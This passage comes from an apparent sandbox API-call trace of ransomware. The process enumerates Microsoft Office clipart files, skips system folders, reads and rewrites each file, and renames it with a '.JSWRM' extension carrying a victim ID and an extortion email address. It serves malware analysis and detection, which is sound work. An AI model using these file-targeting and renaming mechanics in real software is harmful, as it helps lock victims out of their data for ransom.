out: hHeap=0x1e0000) returned 1 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.317] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00346_.WMF", cAlternateFileName="")) returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2=".") returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="..") returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="...") returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="windows") returned -1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="recovery") returned -1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="perflogs") returned -1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="documents and settings") returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="system volume information") returned -1 [0079.317] lstrcmpiW (lpString1="IN00346_.WMF", lpString2="msocache") returned -1 [0079.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00346_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00346_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00346_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00346_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00346_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00346_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0079.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.317] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0079.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.318] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=696) returned 1 [0079.318] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b0) returned 0x20b1f8 [0079.318] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2b0, lpOverlapped=0x0) returned 1 [0079.319] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.319] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2b0, lpOverlapped=0x0) returned 1 [0079.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0079.319] CloseHandle (hObject=0x314) returned 1 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00346_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00346_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0079.322] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x788, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00351_.WMF", cAlternateFileName="")) returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2=".") returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="..") returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="...") returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="windows") returned -1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="recovery") returned -1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="perflogs") returned -1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="documents and settings") returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="system volume information") returned -1 [0079.322] lstrcmpiW (lpString1="IN00351_.WMF", lpString2="msocache") returned -1 [0079.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00351_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00351_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00351_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00351_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00351_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00351_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.323] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1928) returned 1 [0079.323] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0079.323] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0079.332] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.332] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0079.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0079.332] CloseHandle (hObject=0x314) returned 1 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0079.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0079.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0079.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0079.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.332] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00351_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00351_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0079.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.333] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe03547c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00557_.WMF", cAlternateFileName="")) returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2=".") returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="..") returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="...") returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="windows") returned -1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="recovery") returned -1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="perflogs") returned -1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="documents and settings") returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="system volume information") returned -1 [0079.333] lstrcmpiW (lpString1="IN00557_.WMF", lpString2="msocache") returned -1 [0079.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00557_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00557_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00557_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0079.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00557_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00557_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IN00557_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0079.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.334] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9172) returned 1 [0079.334] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23d0) returned 0x24d210 [0079.334] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x23d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x23d0, lpOverlapped=0x0) returned 1 [0079.336] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.336] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x23d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x23d0, lpOverlapped=0x0) returned 1 [0079.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.336] CloseHandle (hObject=0x314) returned 1 [0079.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0079.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0079.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0079.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0079.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.337] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\IN00557_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\in00557_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.338] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe00f20a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe00f20a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe00f20a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="IN00915_.WMF", cAlternateFileName="")) returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2=".") returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="..") returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="...") returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="windows") returned -1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="recovery") returned -1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="perflogs") returned -1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="documents and settings") returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="system volume information") returned -1 [0079.338] lstrcmpiW (lpString1="IN00915_.WMF", lpString2="msocache") returned -1 [0079.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00915_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IN00915_.WMF", 